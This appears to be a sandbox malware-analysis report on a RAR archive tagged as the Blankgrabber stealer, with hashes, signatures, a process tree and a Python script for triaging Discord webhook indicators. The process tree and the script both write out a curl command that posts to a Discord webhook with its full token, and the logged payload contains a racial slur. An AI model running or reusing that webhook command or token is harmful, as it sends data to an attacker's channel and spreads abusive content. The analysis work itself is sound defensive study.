Analysis

  • max time kernel
    45s
  • max time network
    47s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    05-11-2024 02:00

General

  • Target

    AJ's Tool Panel V2.rar

  • Size

    2KB

  • MD5

    b72c7263ba128f6d12c3ce40812ded9c

  • SHA1

    e31b07db1a3548a64b417ebe7d3295f2a8dc7608

  • SHA256

    1b398f3c7c23e843b6c41e36f0274512faec6612f567202835a30e8394c6ce17

  • SHA512

    e8cce4f71537ebca41db4820850db49b7519f3351b1a8bb62d8db6a2aa3840b38878229c1b7cf831ae57eb02c88cb92b973752f4742f402662901ceacbde0035

Malware Config

Signatures

  • Blankgrabber family
  • Detect discord webhook 1 IoCs

    This file contains a Discord webhook URL (see the curl.exe command line under Processes).

  • blankgrabber

    Blankgrabber is an infostealer written in Python and packaged with PyInstaller. Note that in this run only batch scripts, chcp.com, timeout.exe and curl.exe executed; no PyInstaller-packed payload was observed, so the family tag should be checked against the batch file contents rather than taken as proof of an unpacked stealer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs (discord.com webhook endpoint)
  • Delays execution with timeout.exe 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • cURL User-Agent 1 IoCs

    Uses the User-Agent string associated with the cURL utility (curl.exe is invoked directly by the batch file).
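The "Detect discord webhook" and "cURL User-Agent" signatures above boil down to one indicator: a script or command line that POSTs to a `discord.com/api/webhooks/<id>/<token>` URL. The following Python is an added example, not part of the sandbox report and not the sandbox's own signature logic. It extracts webhook IoCs from script text or process command lines, dates the webhook from its snowflake ID (Discord IDs encode a creation timestamp in their top 42 bits), flags command lines that actually send data to one, and masks the token so the IoC can be shared. The webhook ID and token are the ones shown in this report's curl command line; the batch text is constructed to mirror the chcp / timeout / curl sequence in the process tree, with the JSON payload shortened.

```python
"""Added example (not from the sandbox report): triage Discord webhook IoCs."""
import re
from datetime import datetime, timezone

# Discord snowflake IDs carry their creation time in the top 42 bits as
# milliseconds since the Discord epoch, 2015-01-01T00:00:00Z.
DISCORD_EPOCH_MS = 1_420_070_400_000

# Webhook URL on discord.com / discordapp.com (also ptb./canary. hosts):
# .../api/webhooks/<numeric id>/<token>. Group 1 = id, group 2 = token.
WEBHOOK_RE = re.compile(
    r"https?://(?:(?:ptb|canary)\.)?discord(?:app)?\.com/api/webhooks/"
    r"(\d{17,20})/([A-Za-z0-9_-]{60,80})"
)

# Substrings showing the URL is being written to, not merely referenced.
POST_HINTS = ("-X POST", "--data", "-d ", "-F ", "--form",
              "-Method POST", "Invoke-RestMethod", "Invoke-WebRequest")

# Webhook observed in this report (ID and token from the curl command line).
WEBHOOK_ID = "1295784698328645662"
WEBHOOK_TOKEN = "3QDP-7Fc6EO9y9tG_41a3188mlFefHaezIZHMG51_UBl61VGB0M-O_EV1aVWBM2lXTej"
WEBHOOK_URL = f"https://discord.com/api/webhooks/{WEBHOOK_ID}/{WEBHOOK_TOKEN}"

# Constructed batch script mirroring the chcp / timeout / curl sequence in the
# process tree; the JSON payload text is shortened and is not the original.
SAMPLE_BAT = (
    "@echo off\r\n"
    "chcp 65001\r\n"
    "timeout /t 2 /nobreak\r\n"
    'curl -H "Content-Type: application/json" -X POST '
    '-d "{\\"content\\": \\"**Suggestion:** ...\\"}" '
    f'"{WEBHOOK_URL}"\r\n'
)


def snowflake_to_datetime(snowflake: int) -> datetime:
    """Creation time encoded in a Discord snowflake (webhook, channel, user IDs)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def extract_webhooks(text: str) -> list[dict]:
    """Unique webhook IoCs in order of first appearance, with creation time."""
    seen, hits = set(), []
    for m in WEBHOOK_RE.finditer(text):
        wid, token = m.group(1), m.group(2)
        if wid in seen:
            continue
        seen.add(wid)
        hits.append({
            "url": m.group(0),
            "id": wid,
            "token": token,
            "created_utc": snowflake_to_datetime(int(wid)).isoformat(timespec="seconds"),
        })
    return hits


def classify_cmdline(cmdline: str) -> str:
    """'webhook-post' if the command sends data to a webhook, 'webhook-reference'
    if it only contains one, otherwise 'clean'."""
    if not WEBHOOK_RE.search(cmdline):
        return "clean"
    if any(h in cmdline for h in POST_HINTS):
        return "webhook-post"
    return "webhook-reference"


def redact_webhooks(text: str) -> str:
    """Keep the ID for correlation; mask the token so the IoC can be shared."""
    return WEBHOOK_RE.sub(
        lambda m: m.group(0).replace(m.group(2), m.group(2)[:6] + "[REDACTED]"), text
    )


if __name__ == "__main__":
    for hit in extract_webhooks(SAMPLE_BAT):
        print(f"webhook {hit['id']} created {hit['created_utc']} -> {redact_webhooks(hit['url'])}")
    for line in SAMPLE_BAT.splitlines():
        print(f"{classify_cmdline(line):18} {line[:60]}")
```

The snowflake timestamp is worth recording alongside the hash: it tells you when the attacker created the webhook, independent of when the sample was submitted. The "webhook-reference" class exists so that a script which merely echoes or stores the URL is not scored the same as one that posts to it; the POST hints are a heuristic and should be extended for whatever HTTP clients appear in your own telemetry.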

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\AJ's Tool Panel V2.rar"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1020
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4424
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJSLOGO.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
      PID:936
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJ's TooI Panel V2.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5016
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
      PID:4368
    • C:\Windows\system32\timeout.exe
      timeout /t 2 /nobreak
      2⤵
      • Delays execution with timeout.exe
      PID:4816
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
      PID:3248
    • C:\Windows\system32\curl.exe
      curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"**Suggestion:** 2everyone discord.gg?scamalerts niggers **Discord Username:** discord.gg?scamalerts\"}" "https://discord.com/api/webhooks/1295784698328645662/3QDP-7Fc6EO9y9tG_41a3188mlFefHaezIZHMG51_UBl61VGB0M-O_EV1aVWBM2lXTej"
      2⤵
      PID:3424
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
      PID:1784

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJ's TooI Panel V2.bat

    (Note the capital I in "TooI": the batch file name differs from the archive name "AJ's Tool Panel V2" by a single look-alike character.)

    Filesize

    7KB

    MD5

    b714f5d0c3315f80931e93370bd4146b

    SHA1

    f1ff2d405282e323c9575d3f3d7620cb83331718

    SHA256

    ab32009a8e419b8a70ad87862f23f10ba007d2c0e8b63c99bc13c2fd62e94d93

    SHA512

    2801d6ea8ef8da31a3aa0ce026a3a9c4027d4710757f84d9b2886a1392072beef90713a81e72fbaf80de062d61cf43febc0561a9f24c0ac0a0f3dd407e7a1aca

  • C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJSLOGO.bat

    Filesize

    1KB

    MD5

    4dcceb4fddfafcbad51ada85e379551b

    SHA1

    46b881dc521a272728b10c26bddb54517ab8169c

    SHA256

    3de4a6e8f40907ff80e51c67d7cac873c3ceab5f9f737119ca95346b8340a5cd

    SHA512

    d3b0d1454fbfb26c9a28dd56da7ce966ff299de1d9e5a1271f32004665dbb768f18adfef1f9279f7cb438f3a323ce6b00f9ef5cd9cb8b0d80340d8a486fe43d6